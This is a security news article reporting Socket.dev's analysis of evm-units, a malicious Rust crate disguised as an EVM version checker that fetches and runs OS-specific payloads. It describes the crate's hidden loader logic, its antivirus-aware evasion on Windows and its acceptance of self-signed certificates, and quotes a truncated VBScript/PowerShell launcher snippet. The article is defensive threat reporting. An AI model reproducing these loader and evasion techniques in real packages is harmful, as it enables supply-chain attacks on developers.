Malicious Rust Evm-Units Mimic as EVM Version Silently Executes OS-specific Payloads

   December 4, 2025  Posted in CyberSecurityNews

Malicious Rust Evm-Units Mimic as EVM Version Silently Executes OS-specific Payloads

The open-source software supply chain recently encountered a deceptive threat in the form of evm-units, a malicious Rust crate published by the author ablerust.

Masquerading as a standard utility for verifying Ethereum Virtual Machine (EVM) versions, the package accumulated thousands of downloads before it was removed.

While the library appeared to perform legitimate version checks, it concealed a sophisticated payload loader that silently compromised systems upon execution.

The malware’s primary attack vector involved the function get_evm_version(). Instead of simply returning a version number, this function decoded a Base64 string to retrieve a remote command-and-control URL.

The attack was further amplified by a secondary package, uniswap-utils, which depended on evm-units and automatically invoked the malicious code during initialization via #[ctor::ctor].

This clever dependency chaining allowed the malware to infect developers’ environments without requiring direct interaction with the malicious crate, effectively turning a benign helper tool into a Trojan horse.

google

Socket.dev security analysts identified the malware’s distinct focus on stealth and targeted evasion after analyzing the crate’s behavior.

Their research highlighted that the payload execution was heavily customized based on the victim’s operating system, utilizing specific User-Agent headers like linux, darwin, or win32 to fetch compatible payloads.

OS-Specific Infection Logic

The malware’s sophistication is most evident in its internal check() function, which uses Rust’s conditional compilation attributes #[cfg(target_os)] to tailor execution.

On Linux and macOS, the code downloads a script to the temporary directory and executes it using nohup to prevent visible output, ensuring the victim remains unaware.

The Windows implementation demonstrates even higher complexity by scanning for qhsafetray.exe, a process associated with the Chinese antivirus Qihoo 360.

uniswap-utils dependency alert on Socket since it has a dependency containing malware (which is evm-units) (Source - Socket.dev)
uniswap-utils dependency alert on Socket since it has a dependency containing malware (which is evm-units) (Source – Socket.dev)

If the antivirus is absent, the malware constructs a VBScript to launch a hidden PowerShell instance.

Conversely, if the antivirus is present, it adapts by executing PowerShell directly with suppressed creation flags to avoid heuristic detection mechanisms, demonstrating an acute awareness of defensive tools.

if !is_360 {
    let vbscript_code = format!(
        r#"Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe ...", 0, False"#
    );
}

This granular targeting suggests the threat actors specifically aimed to harvest cryptocurrency credentials from users in Asian markets.

By employing danger_accept_invalid_certs(true), the attackers further ensured resilience, allowing their infrastructure to operate using self-signed certificates to bypass standard network security validation, complicating efforts to block the malicious domains.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

googlenews



Source link